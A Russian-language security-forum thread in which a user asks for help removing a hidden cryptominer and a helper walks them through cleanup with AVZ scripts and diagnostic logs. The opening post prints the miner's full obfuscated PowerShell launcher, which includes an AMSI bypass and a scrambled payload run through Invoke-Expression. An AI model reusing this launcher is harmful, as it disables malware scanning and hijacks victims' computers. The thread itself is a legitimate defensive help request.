WaL 0 Опубликовано 1 ноября, 2021 Share Опубликовано 1 ноября, 2021 Здравствуйте. Завелся в системе майнер, грузит процессор. При открытии диспетчера задач сразу нагрузка падает. Kaspersky Virus Removal Tool, Dr.Web CureIt! ничего не обнаружили. с помощью Anvir Task Manager выяснил, что процессор грузит powershell, запускаемый с такими параметрами: Спойлер powershell.exe -c "6370346088;$ZETx='nSyssteema.Mtan9agtem1enpt.dAu_tozma_ti_on).A_ms_iU8ti4ls_-a4ms-iIfni_tF_ai_lewd--No)nP9ub}liqc,nSt.at-ic' -replace('.pF(pF.pF.)'-replace'pF'),('$'+477/477);'o$ZaETkx=c$ZsETnx ,-s]plgit0''-4'';z[Rgef_].2Aslse_mb_ly1.G0et_Ty9pe_($_ZE_Tx?[08])p.GuetfFi_eljd(v$ZmETox[.1][,$_ZE_Tx[[2i])6.Suet_Vaglu_e(o$nfulsl,l(4b776-nie1j28_2)y) '-replace('.pF(pF.pF.)'-replace'pF'),('$'+477/477)|&('qoCSiqoCSeqoCSx'-replace'qoCS');'4&(sgcmm 2A*g-T[y*1)._Na,meu (=''nrus_9i7n5bg 6.S4yf8st_negm1m;um,s_i_,ng5g =Sntys_{t_e6)m.__I_O__;up_soikong_/ qSl,ys?(t}e}_m.!xR{uc/nt__i2m0+e.g)Ijnhste{=rao37pS9-e=rvpvi._c3ex_s;?.u.so8in_]gq t_Mi)fcirsoos_2oef74t.9aW7i-_n3y?2s;g2pulcb{l_2icf_ pc!_laxpsos?{ F8.p_v.bv{htd_e_4le{_g7am7te_f _v_moi2_d{ 23YEy_(_)]p;p_{u(b6_li8vco v_st1_a5trgice} _v,_oi_-d[ [[Dz2_(_)db{bv_y,t_2e[vx]rqg8WF!g=+Fr}il+qe9.ywExhii_sm2tsj)(]bx_rym_u_e{4rhkff_tpewt{/bkr6b)?_rFsiq8le_m.+Rtdea__d_Adkll_aB_y_xtey+sm(9_br__y9u2_er_(haf{_tw(at_b}_r)5_:)(pmbyr7t[e0-[]/,)zR__egtji_s?utrcuyo._wLo+ocua,_lM6_aec8ahi_ynoesw.O_spte)}nS__ufb]iKe,eyb()=@b__rtSa/OFdvT_Wi3AR2wE_\o}Mid_c_r_!os2wotf6/t\woClT9fF\d3ThI_dPbkqr4)_4.G8se5t,[Vay7l4umfe(_ub,r_5yu[_e8rf_hf/6t_w.{tbfgr_,_dnu(-l_ly1);73ijf__(qh_WhF=x==yenau_zllis)arq_etecukrm{n;?jiin4_t __T_Xa_NE5.=1qncWF_f.]Lk_env-g6tp2h;_pf{ohtr(]}i6n?8t ,2h_y5bf=_w0=;//hy![fh ni!=!mT1X_6NE5=-y1mv;he-yfffa++__)f{h_qWnhF![_4hym_ff]_n^==e(.bi3yteder)fibrf5D(pd{PG_iYyF(0z2_-Tgk_8T50_F_Mbn2r__llkt6Jw/so_Zj_GG-uW_N-e[2z_M_((x901_jrGta+Z7/50C__?vm1h=Q7)q2?1-f+)_Ydxoe{gj_X7{sve{r?4kt.q+Xn7f5(z)knio!D!io}P)4(P250!MrxY{ves!Bp_]p4hl2oihPo8g496_fn!n+4w6r6e_d0W4U7myV8w7-s5_br_-[(hl,yf_]M6sf_tW,v9q41l];zr}_Iu]nt_-P_t.-r _qZ(I__X=t_(aI3snts{P_teyr)dq0};(xIn,_t_Pvctr]b 2Nc=mE67a_=7i(If5n_t_[Pt8_r_)wlTX9_NqE-w;N[/teA]_lljro3cf1at=]eiV{{ir-9tuue?al!2Mje8pmo6)r_y_q((t{I?n{rtPzzt_r29)(72-s1?8),3_r]ebef s{Z_Iz[X,1f(lIt?nt?-P_tqwr)c_0n,6(rek_f] 7hNm__Ega)+,0.rxw1r-001_0_,_/0xqr450dl);)mMwa]/rs[!h4a1_l.dbC.oz_py_)(?q9tWFh_,/0_9,Z_kIlXp7,T6oXbN0-E))_;9(_5(Yv2Ey)b[Ma_}r_s{[hac_l{._8Ge+_t]D}_el_2eag.qat_he_Fhaor_]F_u0lnc_[t_ixion_yPjogvinultpeo1r(5_Z=I5xX,_yt/y_hpe6do!fc_(Y84E9)/_))_o(h)!);}xe[xDn_llspIfm7_po_gr_t+/(b!_rjn_-tdjql_l1dbrta),]j2prxbi3v[mat5he8 6ostv_a7thwicn_ ye_mxtsrekrczn wkl_o_dng__ }NgetA_!l_l4+ocffa_td]eVl?iur70tus!a6lk_Me_2m]oduryxf()Insnt__Pht_?r e2O+Xes,r__erf_? Ix9n_t{aPt_fr_ jcjix1u_grk,Iv[n_t1fPt__r3 taZcb7l)f_t,r_ie_f}f Il_n_t__Pta_r6 q,cZ!_P_F5t,U01I_n_gt3a-2_ 2bPM6ycw,i_UIiln9t?g32x! cBs)B)+_;m}'',-r_eptla_ce4''.+(._.)2'',4''$71''k -jre)plnacje''}brj'',7[c!halr]_(3l4)x -ure3plsac_e''cMsstW{'',5[c7hawr]3(3=7)n);h[E_nv_irhon_me8nt_]:c:Cfur_regnt)Diiregctsor,y=3pw_d;_[F?pv8v]{::lDz6()b; '-replace('.nzMY(nzMY.nzMY.)'-replace'nzMY'),('$'+600/600)|&('goZigoZegoZx'-replace'goZ');2005386948" Командная строка Логи автологгера прикладываю, прошу помощи. Архив автологгер Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 1 ноября, 2021 Share Опубликовано 1 ноября, 2021 Здравствуйте! Логи прикрепляйте здесь к сообщению, пожалуйста. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin DeleteSchedulerTask('Microsoft\Windows\Maintenance\WinDAT'); DeleteSchedulerTask('Microsoft\Windows\SpacePort\SpacePort'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); ExecuteRepair(1); RebootWindows(false); end. Компьютер перезагрузится. Файл CheckBrowserLnk.log из папки...\AutoLogger\CheckBrowserLnk перетащите на утилиту ClearLNK. Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению. Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog. Цитата Ссылка на сообщение Поделиться на другие сайты
WaL 0 Опубликовано 1 ноября, 2021 Автор Share Опубликовано 1 ноября, 2021 51 минуту назад, Sandor сказал: Логи прикрепляйте здесь к сообщению, пожалуйста Да, конечно. Почему-то при создании темы не нашел, куда приложить файл. Скрипт выполнил, логи приложил Check_Browsers_LNK.log CollectionLog-2021.11.01-18.17.zip Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 1 ноября, 2021 Share Опубликовано 1 ноября, 2021 2 часа назад, Sandor сказал: ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению Вы не тот прикрепили. В логах порядок. Проблема решена? Цитата Ссылка на сообщение Поделиться на другие сайты
WaL 0 Опубликовано 1 ноября, 2021 Автор Share Опубликовано 1 ноября, 2021 7 минут назад, Sandor сказал: Проблема решена? Вроде да, по крайней мере активности пока не замечаю. Спасибо! ClearLNK-2021.11.01_18.15.08.log Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 1 ноября, 2021 Share Опубликовано 1 ноября, 2021 В завершение: Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работуДождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txtЕсли Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txtПрикрепите этот файл к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
WaL 0 Опубликовано 1 ноября, 2021 Автор Share Опубликовано 1 ноября, 2021 SecurityCheck.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Sandor 1 253 Опубликовано 1 ноября, 2021 Share Опубликовано 1 ноября, 2021 ------------------------------- [ Windows ] ------------------------------- Контроль учётных записей пользователя включен Запрос на повышение прав для администраторов отключен^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^ --------------------------- [ OtherUtilities ] ---------------------------- Notepad++ (64-bit x64) v.8.1.5 Внимание! Скачать обновления Microsoft Office профессиональный плюс 2019 - ru-ru v.16.0.12026.20320 Внимание! Скачать обновления^Инструкция по обновлению Microsoft Office.^ Microsoft Visual Studio Code (User) v.1.56.2 Внимание! Скачать обновления ------------------------------ [ ArchAndFM ] ------------------------------ Total Commander 64-bit (Remove or Repair) v.9.51 Внимание! Скачать обновления WinRAR 6.00 (64-разрядная) v.6.00.0 Внимание! Скачать обновления --------------------------------- [ P2P ] --------------------------------- µTorrent v.3.5.5.46096 Внимание! Клиент сети P2P с рекламным модулем!. -------------------------------- [ Java ] --------------------------------- Java 8 Update 291 (64-bit) v.8.0.2910.10 Внимание! Скачать обновления^Удалите старую версию и установите новую (jre-8u311-windows-x64.exe)^ Java 8 Update 51 (64-bit) v.8.0.510 Внимание! Скачать обновления^Удалите старую версию и установите новую (jre-8u311-windows-x64.exe)^ ------------------------------- [ Browser ] ------------------------------- Blackhawk Emulation Device Drivers for Windows - v1.18.08.06 v.1.18.08.06 Данная программа больше не поддерживается разработчиком. Читайте Рекомендации после удаления вредоносного ПО Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.